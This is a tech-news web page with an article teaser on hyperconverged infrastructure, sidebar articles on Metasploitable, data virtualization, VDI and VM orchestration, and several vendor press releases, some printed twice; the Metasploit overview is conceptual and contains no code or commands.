8 reasons to consider hyperconverged infrastructure for your data center

Demand for on-premises data center equipment is shrinking as organizations move workloads to the cloud. But on-prem is far from dead, and one segment that’s thriving is hyperconverged infrastructure (HCI). HCI is a form of scale-out, software-integrated infrastructure that applies a modular approach to compute, network and storage capacity. Rather than silos with specialized hardware, HCI leverages distributed, horizontal blocks of commodity hardware and delivers a single-pane dashboard for reporting and management. Form factors vary: Enterprises can choose to deploy hardware-agnostic hyperconvergence software from vendors such as Nutanix and VMware, or an integrated HCI appliance from vendors such as HP Enterprise, Dell, Cisco, and Lenovo.

Spotlight

Kineto Wireless

Kineto, now a part of Taqua, strives to assist mobile operators in the transition to IP-based services. Our solutions help operators respond to the growing threat from over-the-top (OTT) service providers and remain competitive as communications service providers.

OTHER ARTICLES
Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | May 18, 2023

Contents 1. Overview 2. Ethical Hacking and Penetration Testing 3. Metasploit Penetration Test 4. Why Choose Metasploit Framework for your Business? 5. Closing remarks 1. Overview Metasploitable refers to an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit. Metasploit is one of the best penetration testing frameworks that helps businesses discover and shore up their systems' vulnerabilities before hackers exploit them. Security engineers use Metasploit as a penetration testing system and a development platform that allows the creation of security tools and exploits. Metasploit's various user interfaces, libraries, tools, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it at the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options. 2. Ethical Hacking and Penetration Testing An ethical hacker is one who works within a security framework and checks for bugs that a malicious hacker might use to exploit networks. They use their experience and skills to render the cyber environment. To protect the infrastructure from the threat that hackers pose, ethical hacking is essential. The main purpose of an ethical hacking service is to report and assess the safety of the targeted systems and networks for the owner. Ethical hacking is performed with penetration test techniques to evaluate security loopholes. There are many techniques used to hack information, such as – Information gathering Vulnerability scanning Exploitation Test analysis Ethical hacking involves automatic methods. The hacking process without automated software is inefficient and time-consuming. There are several tools and methods that can be used for ethical hacking and penetration testing. The Metasploit framework eases the effort to exploit vulnerabilities in networks, operating systems, and applications and generates new exploits for new or unknown vulnerabilities. 3. Metasploit Penetration Test Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spot in the system. Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and payload for penetration. Exploitation: The payload gets executed at the target if the exploit, a tool used to take advantage of system weakness, is successful, and the user gets a shell for interacting with the payload (a shellcode is a small piece of code used as the payload).The most popular payload, a set of malicious codes to attack Windows systems, is Meterpreter, an in-memory-only interactive shell. (Meterpreter is a Metasploit attack payload that provides an interactive shell for the attacker to explore the target machine and execute code.)Other payloads are: Static payloads (it enables port forwarding and communications between networks) Dynamic payloads (to evade antivirus software, it allows testers to generate unique payloads) Command shell payloads (enables users to run scripts or commands against a host) Post-Exploitation: Metasploit offers various exploitation tools for privilege escalation, packet sniffing, keyloggers, screen capture, and pivoting tools once on the target machine. Resolution and Re-Testing: Users set up a persistent backdoor if the target machine gets rebooted. These available features in Metasploit make it easy to configure as per the user's requirements. 4. Why Choose Metasploit Framework for your Business? Significant advantages of the Metasploit Framework are discussed below: Open-source: Metasploit Framework is actively developed as open-source software, so most companies prefer this to grow their businesses. Easy usage: It is very easy to use, defining an easy-naming conversation with the commands. This also facilitates the building of an extensive penetration test of the network. GUI Environment: It mainly provides third-party instances that are friendly. These interfaces ease the penetration testing projects by providing the facilities with services such as button clicks, over-the-fly vulnerability management, and easy-to-shift workspaces, among others. Cleaner Exits: Metasploit can cleanly exit without detection, even if the target system does not restart after a penetration test. Additionally, it offers various options for maintaining persistent access to the target system. Easy Switching Between Payloads: Metasploit allows testers to change payloads with the 'setpayload' command easily. It offers flexibility for system penetration through shell-based access or meterpreter. 5. Closing remarks From DevSecOps experts to hackers, everyone uses the Ruby-based open-source framework Metasploit, which allows testing via command-line alterations or GUI. Metasploitable is a vulnerable virtual machine ideally used for ethical hacking and penetration testing, in VM security. One trend likely to impact the future of Metasploitable is the increasing use of cloud-based environments for testing and production. It is possible that Metasploitable could be adapted to work in cloud environments or that new tools will be developed specifically for cloud-based penetration testing. Another trend that may impact the future of Metasploitable is the growing importance of automation in security testing. Thus, Metasploitable could be adapted to include more automation features. The future of Metasploitable looks bright as it continues to be a valuable tool for security professionals and enthusiasts. As the security landscape continues to evolve, it will be interesting to see how Metasploitable adapts to meet the community's changing needs.

Read More
Virtual Desktop Strategies

How to Start Small and Grow Big with Data Virtualization

Article | July 26, 2022

Why Should Companies Care about Data Virtualization? Data is everywhere. With each passing day, companies generate more data than ever before, and what exactly can they do with all this data? Is it just a matter of storing it? Or should they manage and integrate their data from the various sources? How can they store, manage, integrate and utilize their data to gain information that is of critical value to their business? As they say, knowledge is power, but knowledge without action is useless. This is where the Denodo Platform comes in. The Denodo Platform gives companies the flexibility to evolve their data strategies, migrate to the cloud, or logically unify their data warehouses and data lakes, without affecting business. This powerful platform offers a variety of subscription options that can benefit companies immensely. For example, companies often start out with individual projects using a Denodo Professional subscription, but in a short period of time they end up adding more and more data sources and move on to other Denodo subscriptions such as Denodo Enterprise or Denodo Enterprise Plus. The upgrade process is very easy to establish; in fact, it can be done in less than a day once the cloud marketplace is chosen (Amazon Web Services (AWS), Microsoft Azure, or Google Cloud Platform (GCP). In as little as six weeks companies can realize real business benefits from managing and utilizing their data effectively. A Bridging Layer Data virtualization has been around for quite some time now. Denodo’s founders, Angel Viña and Alberto Pan, have been involved in data virtualization from as far back as the 1990’s. If you’re not familiar with data virtualization, here is a quick summary. Data virtualization is the cornerstone to a logical data architecture, whether it be a logical data warehouse, logical data fabric, data mesh, or even a data hub. All of these architectures are best served by our principals Combine (bring together all your data sources), Connect (into a logical single view) and Consume (through standard connectors to your favorite BI/data science tools or through our easy-to-use robust API’s). Data virtualization is the bridge that joins multiple data sources to fuel analytics. It is also the logical data layer that effectively integrates data silos across disparate systems, manages unified data for centralized security, and delivers it to business users in real time. Economic Benefits in Less Than 6 weeks with Data Virtualization? In a short duration, how can companies benefit from choosing data virtualization as a data management solution? To answer this question, below are some very interesting KPI’s discussed in the recently released Forrester study on the Total Economic Impact of Data Virtualization. For example, companies that have implemented data virtualization have seen an 83% increase in business user productivity. Mainly this is due to the business-centric way a data virtualization platform is delivered. When you implement data virtualization, you provide business users with an easy to access democratized interface to their data needs. The second KPI to note is a 67% reduction in development resources. With data virtualization, you connect to the data, you do not copy it. This means once it is set up, there is a significant reduction in the need for data integration engineers, as data remains in the source location and is not copied around the enterprise. Finally, companies are reporting a 65% improvement in data access speeds above and beyond more traditional approaches such as extract, transform, and load (ETL) processes. A Modern Solution for an Age-Old Problem To understand how data virtualization can help elevate projects to an enterprise level, we can share a few use cases in which companies have leveraged data virtualization to solve their business problems across several different industries. For example, in finance and banking we often see use cases in which data virtualization can be used as a unifying platform to help improve compliance and reporting. In retail, we see use cases including predictive analytics in supply chains as well as next and best actions from a unified view of the customer. There are many uses for data virtualization in a wider variety of situations, such as in healthcare and government agencies. Companies use the Denodo Platform to help data scientists understand key trends and activities, both sociologically as well as economically. In a nutshell, if data exists in more than one source, then the Denodo Platform acts as the unifying platform that connects, combines and allows users to consume the data in a timely, cost-effective manner.

Read More
Server Hypervisors

Why Are Businesses Tilting Towards VDI for Remote Employees?

Article | September 9, 2022

Although remote working or working from home became popular during the COVID era, did you know that the technology that gives the best user experience (UX) for remote work was developed more than three decades ago? Citrix was founded in 1989 as one of the first software businesses to provide the ability to execute any program on any device over any connection. In 2006, VMware coined the term "virtual desktop infrastructure (VDI)" to designate their virtualization products. Many organizations created remote work arrangements in response to the COVID-19 pandemic, and the phenomenon will continue even in 2022. Organizations have used a variety of methods to facilitate remote work over the years. For businesses, VDI has been one of the most effective, allowing businesses to centralize their IT resources and give users remote access to a consolidated pool of computing capacity. Reasons Why Businesses Should Use VDI for their Remote Employees? Companies can find it difficult to scale their operations and grow while operating remotely. VDI, on the other hand, can assist in enhancing these efforts by eliminating some of the downsides of remote work. Device Agnostic As long as employees have sufficient internet connectivity, virtual desktops can accompany them across the world. They can use a tablet, phone, laptop, client side, or Mac to access the virtual desktop. Reduced Support Costs Since VDI setups can often be handled by a smaller IT workforce than traditional PC settings, support expenses automatically go down. Enhanced Security Data security is raised since data never leaves the datacenter. There's no need to be concerned about every hard disk in every computer containing sensitive data. Nothing is stored on the end machine while using the VDI workspace. It also safeguards intellectual property while dealing with contractors, partners, or a worldwide workforce. Comply with Regulations With virtual desktops, organizational data never leaves the data center. Remote employees that have regulatory duties to preserve client/patient data like function because there is no risk of data leaking out from a lost or stolen laptop or retired PC. Enhanced User Experience With a solid user experience (UX), employees can work from anywhere. They can connect to all of their business applications and tools from anywhere they want to call your workplace, exactly like sitting at their office desk, and even answer the phone if they really want to. Closing Lines One of COVID-19's lessons has been to be prepared for almost anything. IT leaders were probably not planning their investments with a pandemic in mind. Irrespective of how the pandemic plays out in the future, the rise of remote work is here to stay. If VDI at scale is to become a permanent feature of business IT strategies, now is the moment to assess where, when, and how your organization can implement the appropriate solutions. Moreover, businesses that use VDI could find that the added flexibility extends their computing refresh cycles.

Read More
Virtual Desktop Strategies, Server Hypervisors

Efficient Management of Virtual Machines using Orchestration

Article | April 27, 2023

Contents 1. Introduction 2. What is Orchestration? 3. How Orchestrating Help Optimize VMs Efficiency? 3.1. Resource Optimization 3.2 Dynamic Scaling 3.3 Faster Deployment 3.4 Improved Security 3.5 Multi-Cloud Management 3.6 Improved Collaboration 4. Considerations while Orchestrating VMs 4.1. Together Hosting of Containers and VMs 4.2 Automated Backup and Restore for VMs 4.3 Ensure Replication for VMs 4.4 Setup Data Synchronization for VMs 5. Conclusion 1. Introduction Orchestration is a superset of automation. Cloud orchestration goes beyond automation, providing coordination between multiple automated activities. Cloud orchestration is increasingly essential due to the growth of containerization, which facilitates scaling applications across clouds, both public and private. The demand for both public cloud orchestration and hybrid cloud orchestration has increased as businesses increasingly adopt a hybrid cloud architecture. The quick adoption of containerized, micro-services-based apps that communicate over APIs has fueled the desire for automation in deploying and managing applications across the cloud. This increase in complexity has created a need for VM orchestration that can manage numerous dependencies across various clouds with policy-driven security and management capabilities. 2. What is Orchestration? Orchestration refers to the process of automating, coordinating, and managing complex systems, workflows, or processes. It typically entails the use of automation tools and platforms to streamline and coordinate the deployment, configuration, management of applications and services across different environments. This includes development, testing, staging, and production. Orchestration tools in cloud computing can be used to automate the deployment and administration of containerized applications across multiple servers or clusters. These tools can help automate tasks such as container provisioning, scaling, load balancing, and health monitoring, making it easier to manage complex application environments. Orchestration ensures organizations automate and streamline their workflows, reduce errors and downtime, and improve the efficacy and scalability of their operations. 3. How Orchestrating Help Optimize VMs Efficiency? Orchestration offers enhanced visibility into the resources and processes in use, which helps prevent VM sprawl and helps organizations trace resource usage by department, business unit, or individual user. Fig. Global Market for VNFO by Virtualization Methodology 2022-27($ million) (Source: Insight Research) The above figure shows, VMs have established a solid legacy that will continue to be relevant in the near to mid-term future. These are 6 ways, in which Orchestration helps vin efficient management of VMs: 3.1. Resource Optimization Orchestrating helps optimize resource utilization by automating the provisioning and de-provisioning of VMs, which allows for efficient use of computing resources. By using orchestration tools, IT teams can set up rules and policies for automatically scaling VMs based on criteria such as CPU utilization, memory usage, network traffic, and application performance metrics. Orchestration also enables advanced techniques such as predictive analytics, machine learning, and artificial intelligence to optimize resource utilization. These technologies can analyze historical data and identify patterns in workload demand, allowing the orchestration system to predict future resource needs and automatically provision or de-provision resources accordingly 3.2. Dynamic Scaling Orchestrating helps automate scaling of VMs, enabling organizations to quickly and easily adjust their computing resources based on demand. It enables IT teams to configure scaling policies and regulations for virtual machines based on resource utilization and network traffic along with performance metrics. When the workload demand exceeds a certain threshold, the orchestration system can autonomously provision additional virtual machines to accommodate the increased load. When workload demand decreases, the orchestration system can deprovision VMs to free up resources and reduce costs. 3.3. Faster Deployment Orchestrating can help automate VM deployment of VMs, reducing the time and effort required to provision new resources. By leveraging advanced technologies such as automation, scripting, and APIs, orchestration can further streamline the VM deployment process. It allows IT teams to define workflows and processes that can be automated using scripts, reducing the time and effort required to deploy new resources. In addition, orchestration can integrate with other IT management tools and platforms, such as cloud management platforms, configuration management tools, and monitoring systems. This enables IT teams to leverage various capabilities and services to streamline the VM deployment and improve efficiency. 3.4. Improved Security Orchestrating can help enhance the security of VMs by automating the deployment of security patches and updates. It also helps ensure VMs are deployed with the appropriate security configurations and settings, reducing the risk of misconfiguration and vulnerability. It enables IT teams to define standard security templates and configurations for VMs, which can be automatically applied during deployment. Furthermore, orchestration can integrate with other security tools and platforms, such as intrusion detection systems and firewalls, to provide a comprehensive security solution. It allows IT teams to automate the deployment of security policies and rules, ensuring that workloads remain protected against various security threats. 3.5. Multi-Cloud Management Orchestration helps provide a single pane of glass for VM management, enabling IT teams to monitor and manage VMs across multiple cloud environments from a single platform. This simplifies management and reduces complexity, enabling IT teams to respond more quickly and effectively to changing business requirements. In addition, orchestration also helps to ensure consistency and compliance across multiple cloud environments. Moreover, orchestration can also integrate with other multi-cloud management tools and platforms, such as cloud brokers and cloud management platforms, to provide a comprehensive solution for managing VMs across multiple clouds. 3.6. Improved Collaboration Orchestration helps streamline collaboration by providing a centralized repository for storing and sharing information related to VMs. Moreover, it also automates many of the routine tasks associated with VM management, reducing the workload for IT teams and freeing up time for more complex tasks. This can improve collaboration by enabling IT teams to focus on more strategic initiatives. In addition, orchestration provides advanced analytics and reporting capabilities, enabling IT teams to track performance, identify bottlenecks, and optimize resource utilization. This improves performance by providing a data-driven approach to VM management and allowing IT teams to work collaboratively to identify and address performance issues. 4. Considerations while Orchestrating VMs 4.1. Together Hosting of Containers and VMs Containers and virtual machines exist together within a single infrastructure and are managed by the same platform. This allows for hosting various projects using a unified management point and the ability to adapt gradually based on current needs and opportunities. This provides greater flexibility for teams to host and administer applications using cutting-edge technologies and established standards and methods. Moreover, as there is no need to invest in distinct physical servers for virtual machines (VMs) and containers, this approach can be a great way to maximize infrastructure utilization, resulting in lower TCO and higher ROI. In addition, unified management drastically simplifies processes, requiring fewer human resources and less time. 4.2. Automated Backup and Restore for VMs --Minimize downtime and reduce risk of data loss Organizations should set up automated backup and restore processes for virtual machines, ensuring critical data and applications are protected during a disaster. This involves scheduling regular backups of virtual machines to a secondary location or cloud storage and setting up automated restore processes to recover virtual machines during an outage or disaster quickly. 4.3. Ensure Replication for VMs --Ensure data and applications are available and accessible in the event of a disaster Organizations should set up replication processes for their VMs, allowing them to be automatically copied to a secondary location or cloud infrastructure. This ensures that critical applications and data are available even during a catastrophic failure at the primary site. 4.4. Setup Data Synchronization for VMs --Improve overall resilience and availability of the system VM orchestration tools should be used to set up data synchronization processes between virtual machines, ensuring that data is consistent and up-to-date across multiple locations. This is particularly important in scenarios where data needs to be accessed quickly from various locations, such as in distributed environments. 5. Conclusion Orchestration provides disaster recovery and business continuity, automatic scalability of distributed systems, and inter-service configuration. Cloud orchestration is becoming significant due to the advent of containerization, which permits scaling applications across clouds, both public and private. We expect continued growth and innovation in the field of VM orchestration, with new technologies and tools emerging to support more efficient and effective management of virtual machines in distributed environments. In addition, as organizations increasingly rely on cloud-based infrastructures and distributed systems, VM orchestration will continue to play a vital role in enabling businesses to operate smoothly and recover quickly from disruptions. VM orchestration will remain a critical component of disaster recovery and high availability strategies for years as organizations continue relying on virtualization technologies to power their operations and drive innovation.

Read More

Spotlight

Kineto Wireless

Kineto, now a part of Taqua, strives to assist mobile operators in the transition to IP-based services. Our solutions help operators respond to the growing threat from over-the-top (OTT) service providers and remain competitive as communications service providers.

Related News

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in the data center applications. The newly launched series IP caters to the advanced requirements of next generation data centers including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and support all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with low memory footprint and encoding latency. With capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieves an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this series IP also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.” About VeriSilicon VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Backup and Disaster Recovery

Minimize the Cost and Downtime of Disaster With Scale Computing's Business Continuity/Disaster Recovery Planning Service

PR Newswire | October 25, 2023

Scale Computing, a market leader in edge computing, virtualization, and hyperconverged solutions, today announced its Business Continuity/Disaster Recovery (BCDR) Planning Service, designed to help organizations establish a comprehensive, regulated plan for responding to unforeseen downtime. The service provides Scale Computing customers and partners with the tools, guidance, and resources to create a playbook for data backup and recovery, enabling businesses to endure a disaster scenario with minimal loss. Scale Computing also recently announced that it is a finalist for the Business Continuity/Disaster Recovery Project of the Year in the 2023 SDC Awards for its work with Austrian managed service provider GiGaNet and its long-time partner the Zillertaler Gletscherbahn group. Voting for the SDC Awards is open at sdcawards.com/vote until November 10th, 2023. Data breaches are one of the biggest and most costly contributors to downtime for businesses. In 2023, the average cost of a data breach globally reached an all-time high of $4.45 million, a 15.3% increase from 2020. Simultaneously, the average length of business disruption following a ransomware attack in the United States reached 24 days last year, up 60% from just two years prior — a significant increase when downtime costs exceed $300,000 per hour for over 90% of mid-sized and large enterprises. For more than half of those businesses, the hourly outage costs range from $1 million to over $5 million. Recovery from an outage adds additional expense from which many enterprises are unable to bounce back. "Disaster can strike at any time, and every organization needs a consistently regulated playbook for how the business will respond — from action plans to recovery plans for bringing online the mission-critical servers businesses depend on," said Jeff Ready, CEO and co-founder, Scale Computing. "Knowing what systems need to be protected, planning for the ability to recover them, and having a full action plan for recovery should be at the forefront of every IT department's agenda, at the beginning of any infrastructure addition. With Scale Computing Platform, the plan for disaster recovery starts before equipment is even put into production, so IT leaders have a plan in place from day one that they can enact to ensure their business stays up and running, with minimal loss, should disaster strike. Our Business Continuity/Disaster Recovery Planning Service enables businesses to proactively classify systems based on their importance and implement a robust action plan, ensuring that our customers' and partners' critical systems are protected, validated, tested, and ready for recovery at any time." Whether a minor data loss or a business-wide shutdown, having a well-defined business continuity strategy is crucial to minimize financial impact, ensure continuous employee productivity, meet compliance and regulatory requirements, decrease liability obligations, reduce downtime, and minimize the risk of negative exposure. Scale Computing's BCDR Planning Service includes planning, deployment, documentation creation, and disaster recovery testing, covering every aspect to keep businesses prepared and resilient. The service is offered to Scale Computing Platform customers, which brings simplicity, high availability, and scalability together to replace existing infrastructure for running virtual machines with an easy-to-manage, fully integrated platform that allows organizations to run applications regardless of hardware requirements. About Scale Computing Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Using patented HyperCore™ technology, Scale Computing Platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime, even when local IT resources and staff are scarce. Edge Computing is the fastest-growing area of IT infrastructure, and industry analysts have named Scale Computing an outperformer and leader in the space, including being named the #1 edge computing vendor by CRN. Scale Computing's products are sold by thousands of value-added resellers, integrators, and service providers worldwide.

Read More

Server Virtualization, VMware

StorMagic Introduces Edge Control Software to Simplify SvSAN Monitoring and Management

Business Wire | October 18, 2023

StorMagic®, solving the world’s edge data problems, today announced the immediate availability of a new Software as a Service (SaaS) tool that allows users to easily monitor and manage all of their SvSAN clusters around the world. StorMagic Edge Control simplifies the process and tools required for day-to-day SvSAN cluster administration. SvSAN customers with multiple locations can significantly reduce the time spent managing their edge sites, whether they are using VMware, Microsoft or KVM hypervisors. “ESG research shows increasing demand for data storage at the edge which fuels an increased need for monitoring solutions that can help address the complexity of storage at the edge,” said Scott Sinclair, practice director at Enterprise Strategy Group. “SvSAN customers can greatly benefit by adding StorMagic Edge Control into their toolkits; the dashboard views and list formats will make centralized data management much easier and more accessible.” Edge Control delivers centralized administration for SvSAN environments of all sizes. Customers can now manage all SvSAN deployments in any location from a single pane of glass. Dashboard and system views provide a fast but comprehensive status of all of their virtual storage appliances (VSAs), allowing them to keep their environment up-to-date more easily and react faster as needed. “StorMagic customers of any size can now manage their entire SvSAN estate, whether it’s one site or thousands of sites around the world,” said Bruce Kornfeld, chief marketing and product officer, StorMagic. “Edge Control is particularly interesting for customers who are considering switching from VMware to Microsoft or Linux KVM because SvSAN and Edge Control are both hypervisor agnostic.” Pricing and Availability Edge Control version 1.0 is available today from StorMagic. SvSAN customers can download and begin using the software immediately, free of charge. About StorMagic StorMagic is solving the world’s edge data problems. We help organizations store, protect and use data at and from the edge. StorMagic’s solutions ensure data is always protected and available, no matter the type or location, to provide value anytime, anywhere. StorMagic’s storage and security products are flexible, robust, easy to use and cost-effective, without sacrificing enterprise-class features, for organizations with one to thousands of sites.

Read More

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in the data center applications. The newly launched series IP caters to the advanced requirements of next generation data centers including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and support all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with low memory footprint and encoding latency. With capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieves an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this series IP also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.” About VeriSilicon VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Backup and Disaster Recovery

Minimize the Cost and Downtime of Disaster With Scale Computing's Business Continuity/Disaster Recovery Planning Service

PR Newswire | October 25, 2023

Scale Computing, a market leader in edge computing, virtualization, and hyperconverged solutions, today announced its Business Continuity/Disaster Recovery (BCDR) Planning Service, designed to help organizations establish a comprehensive, regulated plan for responding to unforeseen downtime. The service provides Scale Computing customers and partners with the tools, guidance, and resources to create a playbook for data backup and recovery, enabling businesses to endure a disaster scenario with minimal loss. Scale Computing also recently announced that it is a finalist for the Business Continuity/Disaster Recovery Project of the Year in the 2023 SDC Awards for its work with Austrian managed service provider GiGaNet and its long-time partner the Zillertaler Gletscherbahn group. Voting for the SDC Awards is open at sdcawards.com/vote until November 10th, 2023. Data breaches are one of the biggest and most costly contributors to downtime for businesses. In 2023, the average cost of a data breach globally reached an all-time high of $4.45 million, a 15.3% increase from 2020. Simultaneously, the average length of business disruption following a ransomware attack in the United States reached 24 days last year, up 60% from just two years prior — a significant increase when downtime costs exceed $300,000 per hour for over 90% of mid-sized and large enterprises. For more than half of those businesses, the hourly outage costs range from $1 million to over $5 million. Recovery from an outage adds additional expense from which many enterprises are unable to bounce back. "Disaster can strike at any time, and every organization needs a consistently regulated playbook for how the business will respond — from action plans to recovery plans for bringing online the mission-critical servers businesses depend on," said Jeff Ready, CEO and co-founder, Scale Computing. "Knowing what systems need to be protected, planning for the ability to recover them, and having a full action plan for recovery should be at the forefront of every IT department's agenda, at the beginning of any infrastructure addition. With Scale Computing Platform, the plan for disaster recovery starts before equipment is even put into production, so IT leaders have a plan in place from day one that they can enact to ensure their business stays up and running, with minimal loss, should disaster strike. Our Business Continuity/Disaster Recovery Planning Service enables businesses to proactively classify systems based on their importance and implement a robust action plan, ensuring that our customers' and partners' critical systems are protected, validated, tested, and ready for recovery at any time." Whether a minor data loss or a business-wide shutdown, having a well-defined business continuity strategy is crucial to minimize financial impact, ensure continuous employee productivity, meet compliance and regulatory requirements, decrease liability obligations, reduce downtime, and minimize the risk of negative exposure. Scale Computing's BCDR Planning Service includes planning, deployment, documentation creation, and disaster recovery testing, covering every aspect to keep businesses prepared and resilient. The service is offered to Scale Computing Platform customers, which brings simplicity, high availability, and scalability together to replace existing infrastructure for running virtual machines with an easy-to-manage, fully integrated platform that allows organizations to run applications regardless of hardware requirements. About Scale Computing Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Using patented HyperCore™ technology, Scale Computing Platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime, even when local IT resources and staff are scarce. Edge Computing is the fastest-growing area of IT infrastructure, and industry analysts have named Scale Computing an outperformer and leader in the space, including being named the #1 edge computing vendor by CRN. Scale Computing's products are sold by thousands of value-added resellers, integrators, and service providers worldwide.

Read More

Server Virtualization, VMware

StorMagic Introduces Edge Control Software to Simplify SvSAN Monitoring and Management

Business Wire | October 18, 2023

StorMagic®, solving the world’s edge data problems, today announced the immediate availability of a new Software as a Service (SaaS) tool that allows users to easily monitor and manage all of their SvSAN clusters around the world. StorMagic Edge Control simplifies the process and tools required for day-to-day SvSAN cluster administration. SvSAN customers with multiple locations can significantly reduce the time spent managing their edge sites, whether they are using VMware, Microsoft or KVM hypervisors. “ESG research shows increasing demand for data storage at the edge which fuels an increased need for monitoring solutions that can help address the complexity of storage at the edge,” said Scott Sinclair, practice director at Enterprise Strategy Group. “SvSAN customers can greatly benefit by adding StorMagic Edge Control into their toolkits; the dashboard views and list formats will make centralized data management much easier and more accessible.” Edge Control delivers centralized administration for SvSAN environments of all sizes. Customers can now manage all SvSAN deployments in any location from a single pane of glass. Dashboard and system views provide a fast but comprehensive status of all of their virtual storage appliances (VSAs), allowing them to keep their environment up-to-date more easily and react faster as needed. “StorMagic customers of any size can now manage their entire SvSAN estate, whether it’s one site or thousands of sites around the world,” said Bruce Kornfeld, chief marketing and product officer, StorMagic. “Edge Control is particularly interesting for customers who are considering switching from VMware to Microsoft or Linux KVM because SvSAN and Edge Control are both hypervisor agnostic.” Pricing and Availability Edge Control version 1.0 is available today from StorMagic. SvSAN customers can download and begin using the software immediately, free of charge. About StorMagic StorMagic is solving the world’s edge data problems. We help organizations store, protect and use data at and from the edge. StorMagic’s solutions ensure data is always protected and available, no matter the type or location, to provide value anytime, anywhere. StorMagic’s storage and security products are flexible, robust, easy to use and cost-effective, without sacrificing enterprise-class features, for organizations with one to thousands of sites.

Read More

Events